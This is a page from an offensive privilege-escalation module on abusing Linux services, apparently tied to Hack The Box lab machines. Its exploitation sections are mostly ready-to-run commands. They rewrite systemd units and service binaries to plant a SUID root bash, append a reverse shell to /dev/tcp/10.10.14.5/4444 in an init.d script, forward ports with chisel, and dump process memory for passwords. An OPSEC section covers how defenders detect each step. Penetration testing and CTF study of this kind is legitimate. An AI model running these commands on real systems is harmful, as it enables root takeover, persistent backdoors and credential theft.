Back to All Modules

Service and Process Abuse

#Overview

System services (systemd, init.d scripts) running as root can be exploited if their configuration files or binaries are writable by a low-privilege user. Additionally, internal services listening only on localhost can be accessed through port forwarding and exploited. Process memory of privileged services may contain credentials that can be dumped.

#Prerequisites

  • User-level shell access
  • Write access to service configuration files or service binaries
  • For internal services: ability to create port forwarding or interact with localhost

#Detection & Enumeration

# List running services
systemctl list-units --type=service --state=running
service --status-all 2>/dev/null

# Find writable systemd service files
find /etc/systemd/system/ -writable -type f 2>/dev/null
find /lib/systemd/system/ -writable -type f 2>/dev/null
find /usr/lib/systemd/system/ -writable -type f 2>/dev/null

# Find writable init.d scripts
ls -la /etc/init.d/
find /etc/init.d/ -writable -type f 2>/dev/null

# Find services running as root
ps aux | grep root

# Find internal services (listening only on 127.0.0.1/localhost)
ss -tlnp | grep 127.0.0.1
netstat -tlnp | grep 127.0.0.1
BASH

#Exploitation / Execution

#Writable Systemd Service Files

# If a systemd service file is writable:
cat > /etc/systemd/system/vulnerable.service << 'EOF'
[Unit]
Description=Vulnerable Service

[Service]
Type=simple
ExecStart=/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash"
Restart=no

[Install]
WantedBy=multi-user.target
EOF

# Reload and restart
systemctl daemon-reload
systemctl restart vulnerable.service
# Or if you can't restart, wait for reboot
/tmp/rootbash -p
BASH

#Restart-Triggered Exploits

When a service runs periodically or on a trigger:

# If you can modify a service that restarts on failure or timer:
# Add a malicious ExecStartPre to an existing service
grep -r "ExecStart" /etc/systemd/system/ 2>/dev/null
# If you find a writable file, add:
# ExecStartPre=/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash"
BASH

#Internal Services on Localhost

# Port forward to access internal services
# From attacker machine, use SSH local forwarding:
ssh -L 8080:127.0.0.1:8080 user@target.htb
# Now access http://localhost:8080 from attacker browser

# Or use chisel on the target:
./chisel client 10.10.14.5:6666 R:8888:127.0.0.1:8080

# Common internal services to enumerate:
# - Databases: 3306 (MySQL), 5432 (PostgreSQL), 27017 (MongoDB), 6379 (Redis)
# - Web apps: 8080, 8443, 3000, 5000, 8000
# - Management: 9090, 10000
BASH

#Process Memory Dumping

# Check /proc for readable memory of privileged processes
# Find a root process (requires ptrace capability or same user)
ps aux | grep root | grep -v "]"

# If you can read /proc/<PID>/mem:
# Dump process memory for credential extraction
cat /proc/<PID>/maps
dd if=/proc/<PID>/mem of=/tmp/proc_dump bs=1 skip=<start> count=<length>
strings /tmp/proc_dump | grep -i password

# gdb (requires ptrace capability)
gdb -p <PID>
(gdb) info proc mappings
(gdb) dump memory /tmp/dump 0x<start> 0x<end>
BASH

#Writable init.d Scripts

# Find writable init scripts
find /etc/init.d/ -writable -type f 2>/dev/null

# Modify the script to spawn a reverse shell
echo '#!/bin/bash
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1' >> /etc/init.d/writable_service

# Restart the service (if you have permission)
/etc/init.d/writable_service restart
# Or wait for reboot / manual restart by admin
BASH

#Service Binary Replacement

# If a service binary is writable:
ls -la /usr/local/bin/some_service

# If writable, replace it:
cp /usr/local/bin/some_service /usr/local/bin/some_service.bak
echo '#!/bin/bash
cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash
exec /usr/local/bin/some_service.bak "$@"' > /usr/local/bin/some_service
chmod +x /usr/local/bin/some_service

# When service restarts, the wrapper runs, creates SUID bash, then executes the original
/tmp/rootbash -p
BASH

#Common Pitfalls

  • systemctl daemon-reload requires privileges to run -- check with sudo -l or use a writable timer that reloads automatically
  • Service restart may require sudo; check sudo -l for service management commands
  • Internal services may require authentication (databases, web apps) -- enumerate credentials first
  • Process memory dumping may require ptrace capability or same UID
  • Service modifications may be reverted by config management (Ansible, Puppet, Chef)
  • Some systemd units have ProtectSystem=full or ReadOnlyPaths= set, preventing modification

#OPSEC Considerations

  • Modifying systemd service files is a high-severity action and is logged by auditd and systemd-journald.
  • Service restart events are logged and may trigger monitoring alerts.
  • Creating SUID binaries in /tmp is easily detected by file integrity monitoring.
  • Port forwarding to internal services may trigger network monitoring alerts.
  • Process memory dumping via ptrace is logged by the kernel audit subsystem.

#Post-Exploitation Value

Service modification provides: persistent root access that survives reboots, credential extraction from privileged process memory, access to internal-only services and databases, and lateral movement to adjacent systems through the service's network access.

#Cross-References

#Tool References

ToolLink
pspyhttps://github.com/DominicBreuker/pspy
gdbapt install gdb

#Source Machines

  • Sau (Easy, Linux) - systemctl service + pager escape to root
  • Monitored (Medium, Linux) - Service command injection + symlink following for SSH key extraction